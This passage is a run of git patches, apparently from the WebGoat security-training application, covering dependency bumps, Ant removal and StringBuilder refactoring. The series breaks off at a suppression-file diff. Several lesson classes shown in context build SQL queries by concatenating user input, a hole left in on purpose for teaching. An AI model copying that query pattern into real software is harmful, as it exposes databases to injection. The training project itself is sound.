                     <li>Doug Morato (Developer &amp; CI)</li>
                     <li>Bruce Mayhew (Developer)</li>
                     <li>Ren&eacute; Zubcevic (Developer)</li>
+                    <li>&Agrave;ngel Oll&eacute; Bl&aacute;zquez (Developer)</li>
                 </ul>
                 </p>
             </div>

From a32055995d078baf1463a59aa1d6d6a39d30a35f Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 18 May 2022 08:36:01 +0200
Subject: [PATCH 146/227] Bump docker/login-action from 1.14.1 to 2.0.0 (#1255)

Bumps [docker/login-action](https://github.com/docker/login-action) from 1.14.1 to 2.0.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.14.1...v2.0.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 102d444bb..5396a8d7b 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -82,7 +82,7 @@ jobs:
         uses: docker/setup-buildx-action@v1
 
       - name: "Login to dockerhub"
-        uses: docker/login-action@v1.14.1
+        uses: docker/login-action@v2.0.0
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}

From 4953dd63ed32c9fd4293eb24864425d7c5f5d6e3 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 18 May 2022 08:36:28 +0200
Subject: [PATCH 147/227] Bump docker/setup-qemu-action from 1.1.0 to 2.0.0
 (#1254)

Bumps [docker/setup-qemu-action](https://github.com/docker/setup-qemu-action) from 1.1.0 to 2.0.0.
- [Release notes](https://github.com/docker/setup-qemu-action/releases)
- [Commits](https://github.com/docker/setup-qemu-action/compare/v1.1.0...v2.0.0)

---
updated-dependencies:
- dependency-name: docker/setup-qemu-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 5396a8d7b..e2e75a0c6 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -74,7 +74,7 @@ jobs:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
       - name: "Set up QEMU"
-        uses: docker/setup-qemu-action@v1.1.0
+        uses: docker/setup-qemu-action@v2.0.0
         with:
           platforms: all
 

From 724666e10f9f504288777abbdab89921b40c3b00 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 18 May 2022 08:36:39 +0200
Subject: [PATCH 148/227] Bump docker/setup-buildx-action from 1 to 2 (#1253)

Bumps [docker/setup-buildx-action](https://github.com/docker/setup-buildx-action) from 1 to 2.
- [Release notes](https://github.com/docker/setup-buildx-action/releases)
- [Commits](https://github.com/docker/setup-buildx-action/compare/v1...v2)

---
updated-dependencies:
- dependency-name: docker/setup-buildx-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index e2e75a0c6..234c65621 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -79,7 +79,7 @@ jobs:
           platforms: all
 
       - name: "Set up Docker Buildx"
-        uses: docker/setup-buildx-action@v1
+        uses: docker/setup-buildx-action@v2
 
       - name: "Login to dockerhub"
         uses: docker/login-action@v2.0.0

From 8a22c88d616b0e43b29b6e9089a0d0350ebb6ea6 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 18 May 2022 08:36:51 +0200
Subject: [PATCH 149/227] Bump docker/build-push-action from 2.10.0 to 3.0.0
 (#1252)

Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 2.10.0 to 3.0.0.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v2.10.0...v3.0.0)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 234c65621..8efaec478 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -88,7 +88,7 @@ jobs:
           password: ${{ secrets.DOCKERHUB_TOKEN }}
 
       - name: "Build and push"
-        uses: docker/build-push-action@v2.10.0
+        uses: docker/build-push-action@v3.0.0
         with:
           context: ./
           file: ./Dockerfile

From aeb481e561e4a379a58ce84b26544b0c28e547d0 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Sat, 4 Jun 2022 18:06:55 +0200
Subject: [PATCH 150/227] Bump actions/cache from 3.0.2 to 3.0.3 (#1260)

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.2 to 3.0.3.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.2...v3.0.3)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 5a6d72d83..241555146 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.2
+        uses: actions/cache@v3.0.3
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.2
+          uses: actions/cache@v3.0.3
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 8efaec478..f8912e6de 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.2
+        uses: actions/cache@v3.0.3
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}

From 7dd0dd0923358ca50ca88e57c62b8d3c88f99854 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 20 Jun 2022 15:25:31 +0200
Subject: [PATCH 151/227] Bump actions/cache from 3.0.3 to 3.0.4 (#1270)

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.3 to 3.0.4.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.3...v3.0.4)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 241555146..8ae51e1ea 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.3
+        uses: actions/cache@v3.0.4
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.3
+          uses: actions/cache@v3.0.4
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index f8912e6de..5cc6c3868 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.3
+        uses: actions/cache@v3.0.4
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}

From e4eb5d783ac5f3877edb97698b1fda6d7c67f369 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Sun, 10 Jul 2022 17:13:26 +0200
Subject: [PATCH 152/227] Some updates and code improvements (#1288)

* try with resources

* StringBuilder

* removed ant and updated spring boot
---
 pom.xml                                       | 21 +---------------
 .../lessons/challenges/challenge7/MD5.java    | 16 ++++++------
 .../client_side_filtering/Salaries.java       | 25 ++++++++++---------
 .../SecurePasswordsAssignment.java            |  2 +-
 .../advanced/SqlInjectionLesson6a.java        |  2 +-
 .../introduction/SqlInjectionLesson10.java    |  2 +-
 .../introduction/SqlInjectionLesson2.java     |  2 +-
 .../introduction/SqlInjectionLesson3.java     |  2 +-
 .../introduction/SqlInjectionLesson4.java     |  2 +-
 .../introduction/SqlInjectionLesson5b.java    |  2 +-
 .../introduction/SqlInjectionLesson8.java     |  4 +--
 .../introduction/SqlInjectionLesson9.java     |  4 +--
 .../owasp/webgoat/lessons/ssrf/SSRFTask1.java |  2 +-
 .../xss/CrossSiteScriptingLesson5a.java       |  2 +-
 .../en/ClientSideFiltering.html               |  6 ++---
 .../webgoat/static/js/libs/mode-java.js       |  2 +-
 .../resources/webgoat/static/js/libs/text.js  | 12 ++++-----
 17 files changed, 46 insertions(+), 62 deletions(-)

diff --git a/pom.xml b/pom.xml
index d9554ac96..a56818b80 100644
--- a/pom.xml
+++ b/pom.xml
@@ -11,7 +11,7 @@
     <parent>
         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-parent</artifactId>
-        <version>2.6.6</version>
+        <version>2.7.1</version>
     </parent>
 
     <name>WebGoat</name>
@@ -119,7 +119,6 @@
         <webwolf.port>9090</webwolf.port>
 
         <!-- Shared properties with plugins and version numbers across submodules-->
-        <ant.version>1.6.5</ant.version>
         <asciidoctorj.version>2.5.2</asciidoctorj.version>
         <bootstrap.version>3.3.7</bootstrap.version>
         <cglib.version>2.2</cglib.version> <!-- do not update necessary for lesson -->
@@ -181,16 +180,6 @@
                 <artifactId>cglib-nodep</artifactId>
                 <version>${cglib.version}</version>
             </dependency>
-            <dependency>
-                <groupId>ant</groupId>
-                <artifactId>ant-launcher</artifactId>
-                <version>${ant.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>ant</groupId>
-                <artifactId>ant</artifactId>
-                <version>${ant.version}</version>
-            </dependency>
             <dependency>
                 <groupId>xml-resolver</groupId>
                 <artifactId>xml-resolver</artifactId>
@@ -452,14 +441,6 @@
             <groupId>cglib</groupId>
             <artifactId>cglib-nodep</artifactId>
         </dependency>
-        <dependency>
-            <groupId>ant</groupId>
-            <artifactId>ant-launcher</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>ant</groupId>
-            <artifactId>ant</artifactId>
-        </dependency>
         <dependency>
             <groupId>xml-resolver</groupId>
             <artifactId>xml-resolver</artifactId>
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
index 9bc444627..7b502c887 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
@@ -164,9 +164,10 @@ public class MD5 {
      * @since ostermillerutils 1.00.00
      */
     public static byte[] getHash(File f) throws IOException {
-        InputStream is = new FileInputStream(f);
-        byte[] hash = getHash(is);
-        is.close();
+        byte[] hash = null;
+        try (InputStream is = new FileInputStream(f)) {
+            hash = getHash(is);
+        }
         return hash;
     }
 
@@ -179,9 +180,10 @@ public class MD5 {
      * @since ostermillerutils 1.00.00
      */
     public static String getHashString(File f) throws IOException {
-        InputStream is = new FileInputStream(f);
-        String hash = getHashString(is);
-        is.close();
+        String hash = null;
+        try (InputStream is = new FileInputStream(f)) {
+            hash = getHashString(is);
+        }
         return hash;
     }
 
@@ -515,7 +517,7 @@ public class MD5 {
      * @since ostermillerutils 1.00.00
      */
     private static String toHex(byte hash[]) {
-        StringBuffer buf = new StringBuffer(hash.length * 2);
+        StringBuilder buf = new StringBuilder(hash.length * 2);
         for (byte element : hash) {
             int intVal = element & 0xff;
             if (intVal < 0x10) {
diff --git a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
index 55843baff..8ad86e647 100644
--- a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
+++ b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
@@ -76,10 +76,14 @@ public class Salaries {
         File d = new File(webGoatHomeDirectory, "ClientSideFiltering/employees.xml");
         XPathFactory factory = XPathFactory.newInstance();
         XPath path = factory.newXPath();
+        int columns = 5;
+        List<Map<String, Object>> json = new ArrayList<>();
+        java.util.Map<String, Object> employeeJson = new HashMap<>();
+
         try (InputStream is = new FileInputStream(d)) {
             InputSource inputSource = new InputSource(is);
 
-            StringBuffer sb = new StringBuffer();
+            StringBuilder sb = new StringBuilder();
 
             sb.append("/Employees/Employee/UserID | ");
             sb.append("/Employees/Employee/FirstName | ");
@@ -89,22 +93,19 @@ public class Salaries {
 
             String expression = sb.toString();
             nodes = (NodeList) path.evaluate(expression, inputSource, XPathConstants.NODESET);
+            for (int i = 0; i < nodes.getLength(); i++) {
+                if (i % columns == 0) {
+                    employeeJson = new HashMap<>();
+                    json.add(employeeJson);
+                }
+                Node node = nodes.item(i);
+                employeeJson.put(node.getNodeName(), node.getTextContent());
+            }
         } catch (XPathExpressionException e) {
             log.error("Unable to parse xml", e);
         } catch (IOException e) {
             log.error("Unable to read employees.xml at location: '{}'", d);
         }
-        int columns = 5;
-        List json = new ArrayList();
-        java.util.Map<String, Object> employeeJson = new HashMap<>();
-        for (int i = 0; i < nodes.getLength(); i++) {
-            if (i % columns == 0) {
-                employeeJson = new HashMap<>();
-                json.add(employeeJson);
-            }
-            Node node = nodes.item(i);
-            employeeJson.put(node.getNodeName(), node.getTextContent());
-        }
         return json;
     }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
index ac8ba7f1f..c8108237f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
@@ -42,7 +42,7 @@ public class SecurePasswordsAssignment extends AssignmentEndpoint {
     @ResponseBody
     public AttackResult completed(@RequestParam String password) {
         Zxcvbn zxcvbn = new Zxcvbn();
-        StringBuffer output = new StringBuffer();
+        StringBuilder output = new StringBuilder();
         DecimalFormat df = new DecimalFormat("0", DecimalFormatSymbols.getInstance(Locale.ENGLISH));
         df.setMaximumFractionDigits(340);
         Strength strength = zxcvbn.measure(password);
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
index 819b460fe..943d44570 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
@@ -68,7 +68,7 @@ public class SqlInjectionLesson6a extends AssignmentEndpoint {
 
                 if ((results != null) && (results.first())) {
                     ResultSetMetaData resultsMetaData = results.getMetaData();
-                    StringBuffer output = new StringBuffer();
+                    StringBuilder output = new StringBuilder();
 
                     output.append(SqlInjectionLesson5a.writeTable(results, resultsMetaData));
 
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
index a4b5e94ab..bc5141068 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
@@ -54,7 +54,7 @@ public class SqlInjectionLesson10 extends AssignmentEndpoint {
     }
 
     protected AttackResult injectableQueryAvailability(String action) {
-        StringBuffer output = new StringBuffer();
+        StringBuilder output = new StringBuilder();
         String query = "SELECT * FROM access_log WHERE action LIKE '%" + action + "%'";
 
         try (Connection connection = dataSource.getConnection()) {
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
index 9bc3a335d..4a8d5f250 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
@@ -60,7 +60,7 @@ public class SqlInjectionLesson2 extends AssignmentEndpoint {
         try (var connection = dataSource.getConnection()) {
             Statement statement = connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY);
             ResultSet results = statement.executeQuery(query);
-            StringBuffer output = new StringBuffer();
+            StringBuilder output = new StringBuilder();
 
             results.first();
 
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
index eba5c2f98..e67275535 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
@@ -64,7 +64,7 @@ public class SqlInjectionLesson3 extends AssignmentEndpoint {
                         CONCUR_READ_ONLY);
                 statement.executeUpdate(query);
                 ResultSet results = checkStatement.executeQuery("SELECT * FROM employees WHERE last_name='Barnett';");
-                StringBuffer output = new StringBuffer();
+                StringBuilder output = new StringBuilder();
                 // user completes lesson if the department of Tobi Barnett now is 'Sales'
                 results.first();
                 if (results.getString("department").equals("Sales")) {
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
index 42ef23b84..101725c92 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
@@ -63,7 +63,7 @@ public class SqlInjectionLesson4 extends AssignmentEndpoint {
                 statement.executeUpdate(query);
                 connection.commit();
                 ResultSet results = statement.executeQuery("SELECT phone from employees;");
-                StringBuffer output = new StringBuffer();
+                StringBuilder output = new StringBuilder();
                 // user completes lesson if column phone exists
                 if (results.first()) {
                     output.append("<span class='feedback-positive'>" + query + "</span>");
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
index fc1b37a72..c7514ff10 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
@@ -72,7 +72,7 @@ public class SqlInjectionLesson5b extends AssignmentEndpoint {
 
                 if ((results != null) && (results.first() == true)) {
                     ResultSetMetaData resultsMetaData = results.getMetaData();
-                    StringBuffer output = new StringBuffer();
+                    StringBuilder output = new StringBuilder();
 
                     output.append(SqlInjectionLesson5a.writeTable(results, resultsMetaData));
                     results.last();
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
index 949ba155e..90c1c911d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
@@ -56,7 +56,7 @@ public class SqlInjectionLesson8 extends AssignmentEndpoint {
     }
 
     protected AttackResult injectableQueryConfidentiality(String name, String auth_tan) {
-        StringBuffer output = new StringBuffer();
+        StringBuilder output = new StringBuilder();
         String query = "SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
 
         try (Connection connection = dataSource.getConnection()) {
@@ -98,7 +98,7 @@ public class SqlInjectionLesson8 extends AssignmentEndpoint {
         ResultSetMetaData resultsMetaData = results.getMetaData();
         int numColumns = resultsMetaData.getColumnCount();
         results.beforeFirst();
-        StringBuffer table = new StringBuffer();
+        StringBuilder table = new StringBuilder();
         table.append("<table>");
 
         if (results.next()) {
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
index 77dab2cea..16b60b19d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
@@ -57,7 +57,7 @@ public class SqlInjectionLesson9 extends AssignmentEndpoint {
     }
 
     protected AttackResult injectableQueryIntegrity(String name, String auth_tan) {
-        StringBuffer output = new StringBuffer();
+        StringBuilder output = new StringBuilder();
         String query = "SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
         try (Connection connection = dataSource.getConnection()) {
             try {
@@ -86,7 +86,7 @@ public class SqlInjectionLesson9 extends AssignmentEndpoint {
         }
     }
 
-    private AttackResult checkSalaryRanking(Connection connection, StringBuffer output) {
+    private AttackResult checkSalaryRanking(Connection connection, StringBuilder output) {
         try {
             String query = "SELECT * FROM employees ORDER BY salary DESC";
             try (Statement statement = connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE);
diff --git a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
index 5b797db24..6f12b3d9d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
@@ -43,7 +43,7 @@ public class SSRFTask1 extends AssignmentEndpoint {
 
     protected AttackResult stealTheCheese(String url) {
         try {
-            StringBuffer html = new StringBuffer();
+            StringBuilder html = new StringBuilder();
 
             if (url.matches("images/tom.png")) {
                 html.append("<img class=\"image\" alt=\"Tom\" src=\"images/tom.png\" width=\"25%\" height=\"25%\">");
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
index 6c679c819..9a7c1135a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
@@ -61,7 +61,7 @@ public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
         double totalSale = QTY1.intValue() * 69.99 + QTY2.intValue() * 27.99 + QTY3.intValue() * 1599.99 + QTY4.intValue() * 299.99;
 
         userSessionData.setValue("xss-reflected1-complete", "false");
-        StringBuffer cart = new StringBuffer();
+        StringBuilder cart = new StringBuilder();
         cart.append("Thank you for shopping at WebGoat. <br />Your support is appreciated<hr />");
         cart.append("<p>We have charged credit card:" + field1 + "<br />");
         cart.append("                             ------------------- <br />");
diff --git a/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html b/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html
index 3a67cfb18..3dc36ab2d 100644
--- a/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html
+++ b/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html
@@ -51,7 +51,7 @@ even if it is hidden it is easy to find the sensitive date. In this
 stage you will add a filter to the XPath queries. In this file you will find 
 following construct:<br><br></p>
 <code>
-	StringBuffer sb = new StringBuffer();<br>
+	StringBuilder sb = new StringBuilder();<br>
 	
 	sb.append("/Employees/Employee/UserID | ");<br>
 	sb.append("/Employees/Employee/FirstName | ");<br>
@@ -66,7 +66,7 @@ This string will be used for the XPath query. You have to guarantee that a mange
 can see employees which are working for him. To archive this you can use
 filters in XPath. Following code will exactly do this:</p>
 <code>
-	StringBuffer sb = new StringBuffer();<br>
+	StringBuilder sb = new StringBuilder();<br>
 	
 	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | ");<br>
 	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");<br>
@@ -81,4 +81,4 @@ Now only information is sent to your client you are authorized for. You can clic
 </p>
 
 </body>
-</html>
\ No newline at end of file
+</html>
diff --git a/src/main/resources/webgoat/static/js/libs/mode-java.js b/src/main/resources/webgoat/static/js/libs/mode-java.js
index 779ede26c..3374fdcf0 100644
--- a/src/main/resources/webgoat/static/js/libs/mode-java.js
+++ b/src/main/resources/webgoat/static/js/libs/mode-java.js
@@ -831,7 +831,7 @@ var JavaHighlightRules = function() {
         "Readable|Runtime|StringBuilder|Math|IncompatibleClassChangeError|"+
         "NoSuchMethodError|ThreadLocal|RuntimePermission|ArithmeticException|"+
         "NullPointerException|Long|Integer|Short|Byte|Double|Number|Float|"+
-        "Character|Boolean|StackTraceElement|Appendable|StringBuffer|"+
+        "Character|Boolean|StackTraceElement|Appendable|StringBuilder|"+
         "Iterable|ThreadGroup|Runnable|Thread|IllegalMonitorStateException|"+
         "StackOverflowError|OutOfMemoryError|VirtualMachineError|"+
         "ArrayStoreException|ClassCastException|LinkageError|"+
diff --git a/src/main/resources/webgoat/static/js/libs/text.js b/src/main/resources/webgoat/static/js/libs/text.js
index 4c311edce..2743b46c7 100644
--- a/src/main/resources/webgoat/static/js/libs/text.js
+++ b/src/main/resources/webgoat/static/js/libs/text.js
@@ -311,14 +311,14 @@ define(['module'], function (module) {
             typeof Packages !== 'undefined' && typeof java !== 'undefined')) {
         //Why Java, why is this so awkward?
         text.get = function (url, callback) {
-            var stringBuffer, line,
+            var stringBuilder, line,
                 encoding = "utf-8",
                 file = new java.io.File(url),
                 lineSeparator = java.lang.System.getProperty("line.separator"),
                 input = new java.io.BufferedReader(new java.io.InputStreamReader(new java.io.FileInputStream(file), encoding)),
                 content = '';
             try {
-                stringBuffer = new java.lang.StringBuffer();
+                stringBuilder = new java.lang.StringBuilder();
                 line = input.readLine();
 
                 // Byte Order Mark (BOM) - The Unicode Standard, version 3.0, page 324
@@ -334,15 +334,15 @@ define(['module'], function (module) {
                 }
 
                 if (line !== null) {
-                    stringBuffer.append(line);
+                    stringBuilder.append(line);
                 }
 
                 while ((line = input.readLine()) !== null) {
-                    stringBuffer.append(lineSeparator);
-                    stringBuffer.append(line);
+                    stringBuilder.append(lineSeparator);
+                    stringBuilder.append(line);
                 }
                 //Make sure we return a JavaScript string and not a Java string.
-                content = String(stringBuffer.toString()); //String
+                content = String(stringBuilder.toString()); //String
             } finally {
                 input.close();
             }

From f8b7ca5c855bc29938cc29df84a3bd7be00e91a3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Mon, 11 Jul 2022 13:28:44 +0200
Subject: [PATCH 153/227] Pom update (#1290)

* asciidoctorj update

* pom and suppression updates
---
 .../dependency-check/project-suppression.xml  | 95 +++++++++++++------
 pom.xml                                       | 13 +--
 .../advanced/SqlInjectionLesson6a.java        | 17 ++--
 .../SqlInjectionLesson6aTest.java             |  2 -
 4 files changed, 76 insertions(+), 51 deletions(-)

diff --git a/config/dependency-check/project-suppression.xml b/config/dependency-check/project-suppression.xml
index a2a8e8470..7df811240 100644
--- a/config/dependency-check/project-suppression.xml
+++ b/config/dependency-check/project-suppression.xml
